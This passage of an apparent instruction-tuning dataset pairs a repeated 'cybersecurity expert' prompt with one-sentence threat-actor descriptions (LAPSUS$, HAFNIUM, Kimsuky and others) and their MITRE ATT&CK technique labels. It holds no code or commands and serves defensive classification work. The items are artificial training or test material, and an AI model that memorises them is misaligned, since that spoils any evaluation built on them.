a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.", + "output": "- T1578.003: Modify Cloud Compute Infrastructure - Delete Cloud Instance" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has set up and operated websites to gather information and deliver malware.", + "output": "- T1583.001: Acquire Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Axiom has acquired dynamic DNS services for use in the targeting of intended victims.", + "output": "- T1583.002: Acquire Infrastructure - DNS Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Axiom has used VPS hosting providers in targeting of intended victims.", + "output": "- T1583.003: Acquire Infrastructure - Virtual Private Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has acquired VPS infrastructure for use in malicious campaigns.", + "output": "- T1583.003: Acquire Infrastructure - Virtual Private Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAFNIUM has operated from leased virtual private servers (VPS) in the United States.", + "output": "- T1583.003: Acquire Infrastructure - Virtual Private Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader.", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAFNIUM has acquired web services for use in C2 and exfiltration.", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has compromised legitimate websites to host C2 and malware modules.", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indrik Spider has served fake updates via legitimate websites that have been compromised.", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has used a large-scale botnet to target Small Office/Home Office (SOHO) network devices.", + "output": "- T1584.005: Compromise Infrastructure - Botnet" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla has frequently used compromised WordPress sites for C2 infrastructure.", + "output": "- T1584.006: Compromise Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan has compromised social media accounts to conduct social engineering attacks.", + "output": "- T1586.001: Compromise Accounts - Social Media Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HEXANE has used compromised accounts to send spearphishing emails.", + "output": "- T1586.002: Compromise Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has compromised email accounts to send spearphishing e-mails.", + "output": "- T1586.002: Compromise Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky created and used a mailing toolkit to use in spearphishing attacks.", + "output": "- T1587: Develop Capabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PROMETHIUM has created self-signed certificates to sign malicious installers.", + "output": "- T1587.002: Develop Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.", + "output": "- T1587.002: Develop Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT1 used publicly available malware for privilege escalation.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For C0015, the threat actors used Cobalt Strike and Conti ransomware.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For FunnyDream, the threat actors used a new backdoor named FunnyDream.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT-C-36 obtained and used a modified variant of Imminent Monitor.", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ember Bear has stolen legitimate certificates to sign malicious payloads.", + "output": "- T1588.003: Obtain Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.", + "output": "- T1588.003: Obtain Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MegaCortex has used code signing certificates issued to fake companies to bypass security controls.", + "output": "- T1588.003: Obtain Capabilities - Code Signing Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackTech has used valid, stolen digital certificates for some of their malware and tools.", + "output": "- T1588.004: Obtain Capabilities - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky has obtained exploit code for various CVEs.", + "output": "- T1588.005: Obtain Capabilities - Exploits" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has conducted targeted surveillance against activists and bloggers.", + "output": "- T1589: Gather Victim Identity Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HEXANE has identified specific potential victims at targeted organizations.", + "output": "- T1589: Gather Victim Identity Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.", + "output": "- T1589: Gather Victim Identity Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has harvested user's login credentials.", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites.", + "output": "- T1589.001: Gather Victim Identity Information - Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.", + "output": "- T1589.002: Gather Victim Identity Information - Email Addresses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team's research of potential victim organizations included the identification and collection of employee information.", + "output": "- T1589.003: Gather Victim Identity Information - Employee Names" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Silent Librarian has collected lists of names for individuals from targeted organizations.", + "output": "- T1589.003: Gather Victim Identity Information - Employee Names" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.", + "output": "- T1590.001: Gather Victim Network Information - Domain Properties" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Andariel has limited its watering hole attacks to specific IP address ranges.", + "output": "- T1590.005: Gather Victim Network Information - IP Addresses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.", + "output": "- T1591: Gather Victim Org Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.", + "output": "- T1591.004: Gather Victim Org Information - Identify Roles" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.", + "output": "- T1591.004: Gather Victim Org Information - Identify Roles" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.", + "output": "- T1592.002: Gather Victim Host Information - Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.", + "output": "- T1592.004: Gather Victim Host Information - Client Configurations" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.", + "output": "- T1593.001: Search Open Websites/Domains - Social Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has searched public code repositories for exposed credentials.", + "output": "- T1593.003: Search Open Websites/Domains - Code Repositories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails.", + "output": "- T1594: Search Victim-Owned Websites" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has scanned specific lists of target IP addresses.", + "output": "- T1595.001: Active Scanning - Scanning IP Blocks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.", + "output": "- T1595.003: Active Scanning - Wordlist Scanning" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat 